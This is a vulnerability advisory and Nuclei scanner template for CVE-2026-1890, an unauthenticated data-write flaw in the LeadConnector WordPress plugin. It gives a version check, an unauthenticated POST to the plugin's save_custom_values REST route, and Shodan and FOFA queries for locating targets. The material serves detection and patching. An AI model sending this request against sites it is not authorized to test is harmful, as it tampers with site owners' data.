LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write
CVE-2026-1890
Early Release
Description
LeadConnector WordPress plugin < 3.0.22 contains a broken access control caused by missing authorization in a REST route, letting unauthenticated attackers overwrite existing data remotely, exploit requires no authentication.
Severity
Medium
CVSS Score
5.3
Exploit Probability
1%
Affected Product
leadconnector
Published Date
July 2, 2026
Template Author
0x_akoko
CVE-2026-1890.yaml
id: CVE-2026-1890
info:
name: LeadConnector < 3.0.22 - Unauthenticated Arbitrary Data Write
author: 0x_Akoko
severity: medium
description: |
LeadConnector WordPress plugin < 3.0.22 contains a broken access control caused by missing authorization in a REST route, letting unauthenticated attackers overwrite existing data remotely, exploit requires no authentication.
impact: |
Unauthenticated attackers can overwrite existing data, potentially leading to data tampering and loss of integrity.
remediation: |
Update to version 3.0.22 or later.
reference:
- https://wpscan.com/vulnerability/9b88be70-b5cc-4a3f-a871-64d61cb02076/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1890
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2026-1890
epss-score: 0.00645
epss-percentile: 0.46545
cwe-id: CWE-862
metadata:
verified: true
max-request: 2
vendor: leadconnector
product: leadconnector
fofa-query: body="/wp-content/plugins/leadconnector/"
shodan-query: http.html:"leadconnector"
tags: cve,cve2026,wordpress,wp-plugin,leadconnector,unauth,rest-api,intrusive,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/leadconnector/README.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "LeadConnector")'
- 'compare_versions(lsversion, ">=1.0.0", "<=3.0.21")'
condition: and
internal: true
extractors:
- type: regex
name: lsversion
internal: true
regex:
- 'Stable tag: ([\d.]+)'
group: 1
- raw:
- |
POST /wp-json/lc_internal_api/v1/save_custom_values HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"custom_values":[{"fieldKey":"{{randstr}}","id":"1"}]}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "status", "success")'
condition: and
# digest: 4a0a00473045022100fb947a688494c002418949a721fd1e38404730060347726521ee7ffdfa2dda13022005352a4aaed30366613a710f8634081f1194667c88744a1094795c515f7e150e:922c64590222798bb761d5b6d8e729505.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE ID:
cve-2026-1890
CWE ID:
cwe-862
Remediation Steps
Update to version 3.0.22 or later.